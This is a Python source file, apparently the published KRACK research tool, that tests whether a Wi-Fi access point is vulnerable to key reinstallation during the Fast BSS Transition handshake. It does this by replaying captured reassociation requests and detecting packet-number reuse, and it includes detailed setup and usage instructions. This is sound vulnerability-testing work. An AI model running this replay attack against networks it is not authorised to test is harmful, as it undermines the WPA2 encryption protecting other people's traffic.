krack-ft-test.py 10 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284
  1. #!/usr/bin/env python2
  2. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  3. #
  4. # This code may be distributed under the terms of the BSD license.
  5. # See README for more details.
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. from scapy.all import *
  9. from libwifi import *
  10. import sys, socket, struct, time, subprocess, atexit, select
  11. from datetime import datetime
  12. IEEE_TLV_TYPE_RSN = 48
  13. IEEE_TLV_TYPE_FT = 55
  14. IEEE80211_RADIOTAP_RATE = (1 << 2)
  15. IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  16. IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  17. IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
  18. #TODO: - !! Assured synchronization between hostapd actions (sending broadcast AP) and hostapd resetting IVs !!
  19. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
  20. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
  21. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
  22. # FIXME: We are repeating the "disable hw encryption" script to client tests
  23. USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP
  24. To test wheter an AP is vulnerable to a Key Reinstallation Attack against
  25. the Fast BSS Transition (FT) handshake, take the following steps:
  26. 1. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  27. with our script. So disable hardware encryption by executing:
  28. ./disable-hwcrypto.sh
  29. This only needs to be done once. It's recommended to reboot after executing
  30. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  31. or similar to confirm the nohwcript/.. param has been set. We tested this
  32. with an a TP-Link TL-WN722N and an Alfa AWUS051NH v2.
  33. 2. Create a wpa_supplicant configuration file that can be used to connect
  34. to the network. A basic example is:
  35. ctrl_interface=/var/run/wpa_supplicant
  36. network={{
  37. ssid="testnet"
  38. key_mgmt=FT-PSK
  39. psk="password"
  40. }}
  41. Note the use of "FT-PSK". Save it as network.conf or similar. For more
  42. info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf
  43. 3. Try to connect to the network using your platform's wpa_supplicant.
  44. This will likely require a command such as:
  45. sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  46. If this fails, either the AP does not support FT, or you provided the wrong
  47. network configuration options in step 1.
  48. 4. Use this script as a wrapper over the previous wpa_supplicant command:
  49. sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  50. This will execute the wpa_supplicant command using the provided parameters,
  51. and will add a virtual monitor interface that will perform attack tests.
  52. 5. Use wpa_cli to roam to a different AP of the same network. For example:
  53. sudo wpa_cli -i wlan0
  54. > status
  55. bssid=c4:e9:84:db:fb:7b
  56. ssid=testnet
  57. ...
  58. > scan_results
  59. bssid / frequency / signal level / flags / ssid
  60. c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  61. c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  62. ...
  63. > roam c4:e9:84:1d:a5:bc
  64. ...
  65. In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
  66. status command). The scan_results command shows this network also has a
  67. second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.
  68. 6. Generate traffic between the AP and client. For example:
  69. sudo arping -I wlan0 192.168.1.10
  70. 7. Now look at the output of {name} to see if the AP is vulnerable.
  71. 6a. First it should say "Detected FT reassociation frame". Then it will
  72. start replaying this frame to try the attack.
  73. 6b. The script shows which IVs (= packet numbers) the AP is using when
  74. sending data frames.
  75. 6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
  76. we confirmed it's vulnerable.
  77. !! Be sure to manually check network traces as well, to confirm this script
  78. !! is replaying the reassociation request properly, and to manually confirm
  79. !! whether there is IV (= packet number) reuse or not.
  80. Example output of vulnerable AP:
  81. [15:59:24] Replaying Reassociation Request
  82. [15:59:25] AP transmitted data using IV=1 (seq=0)
  83. [15:59:25] Replaying Reassociation Request
  84. [15:59:26] AP transmitted data using IV=1 (seq=0)
  85. [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!
  86. Example output of patched AP (note that IVs are never reused):
  87. [16:00:49] Replaying Reassociation Request
  88. [16:00:49] AP transmitted data using IV=1 (seq=0)
  89. [16:00:50] AP transmitted data using IV=2 (seq=1)
  90. [16:00:50] Replaying Reassociation Request
  91. [16:00:51] AP transmitted data using IV=3 (seq=2)
  92. [16:00:51] Replaying Reassociation Request
  93. [16:00:52] AP transmitted data using IV=4 (seq=3)
  94. """
  95. #### Basic output and logging functionality ####
  96. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  97. COLORCODES = { "gray" : "\033[0;37m",
  98. "green" : "\033[0;32m",
  99. "orange": "\033[0;33m",
  100. "red" : "\033[0;31m" }
  101. global_log_level = INFO
  102. def log(level, msg, color=None, showtime=True):
  103. if level < global_log_level: return
  104. if level == DEBUG and color is None: color="gray"
  105. if level == WARNING and color is None: color="orange"
  106. if level == ERROR and color is None: color="red"
  107. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  108. #### Man-in-the-middle Code ####
  109. class KRAckAttackFt():
  110. def __init__(self, interface):
  111. self.nic_iface = interface
  112. self.nic_mon = interface + "mon"
  113. self.clientmac = scapy.arch.get_if_hwaddr(interface)
  114. self.sock = None
  115. self.wpasupp = None
  116. self.reset_client()
  117. def reset_client(self):
  118. self.reassoc = None
  119. self.ivs = IvCollection()
  120. self.next_replay = None
  121. def start_replay(self, p):
  122. assert Dot11ReassoReq in p
  123. self.reassoc = p
  124. self.next_replay = time.time() + 1
  125. def process_frame(self, p):
  126. # Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
  127. # header of the (now decrypted) frame.
  128. # FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
  129. if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
  130. # If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
  131. payload = str(p[Dot11WEP])
  132. # Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
  133. # *not* the header of a plaintext EAPOL handshake frame
  134. if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
  135. log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
  136. log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
  137. quit(1)
  138. # Client performing a (possible new) handshake
  139. if self.clientmac in [p.addr1, p.addr2] and Dot11Auth in p:
  140. self.reset_client()
  141. log(INFO, "Detected Authentication frame, clearing client state")
  142. elif p.addr2 == self.clientmac and Dot11ReassoReq in p:
  143. self.reset_client()
  144. if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
  145. log(INFO, "Detected FT reassociation frame")
  146. self.start_replay(p)
  147. else:
  148. log(INFO, "Reassociation frame does not appear to be an FT one")
  149. elif p.addr2 == self.clientmac and Dot11AssoReq in p:
  150. log(INFO, "Detected normal association frame")
  151. self.reset_client()
  152. # Encrypted data sent to the client
  153. elif p.addr1 == self.clientmac and Dot11WEP in p:
  154. iv = dot11_get_iv(p)
  155. log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
  156. if self.ivs.is_iv_reused(p):
  157. log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
  158. "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
  159. self.ivs.track_used_iv(p)
  160. def handle_rx(self):
  161. p = self.sock.recv()
  162. if p == None: return
  163. self.process_frame(p)
  164. def configure_interfaces(self):
  165. log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
  166. # 0. Some users may forget this otherwise
  167. subprocess.check_output(["rfkill", "unblock", "wifi"])
  168. # 1. Remove unused virtual interfaces to start from a clean state
  169. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  170. # 2. Configure monitor mode on interfaces
  171. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  172. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  173. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  174. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  175. time.sleep(0.5)
  176. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  177. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  178. def run(self):
  179. self.configure_interfaces()
  180. self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  181. # Open the wpa_supplicant client that will connect to the network that will be tested
  182. self.wpasupp = subprocess.Popen(sys.argv[1:])
  183. # Monitor the virtual monitor interface of the client and perform the needed actions
  184. while True:
  185. sel = select.select([self.sock], [], [], 1)
  186. if self.sock in sel[0]: self.handle_rx()
  187. if self.reassoc and time.time() > self.next_replay:
  188. log(INFO, "Replaying Reassociation Request")
  189. self.sock.send(self.reassoc)
  190. self.next_replay = time.time() + 1
  191. def stop(self):
  192. log(STATUS, "Closing wpa_supplicant and cleaning up ...")
  193. if self.wpasupp:
  194. self.wpasupp.terminate()
  195. self.wpasupp.wait()
  196. if self.sock: self.sock.close()
  197. def cleanup():
  198. attack.stop()
  199. def argv_get_interface():
  200. for i in range(len(sys.argv)):
  201. if not sys.argv[i].startswith("-i"):
  202. continue
  203. if len(sys.argv[i]) > 2:
  204. return sys.argv[i][2:]
  205. else:
  206. return sys.argv[i + 1]
  207. return None
  208. if __name__ == "__main__":
  209. if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
  210. print USAGE.format(name=sys.argv[0])
  211. quit(1)
  212. # TODO: Verify that we only accept CCMP?
  213. interface = argv_get_interface()
  214. if not interface:
  215. log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
  216. quit(1)
  217. attack = KRAckAttackFt(interface)
  218. atexit.register(cleanup)
  219. attack.run()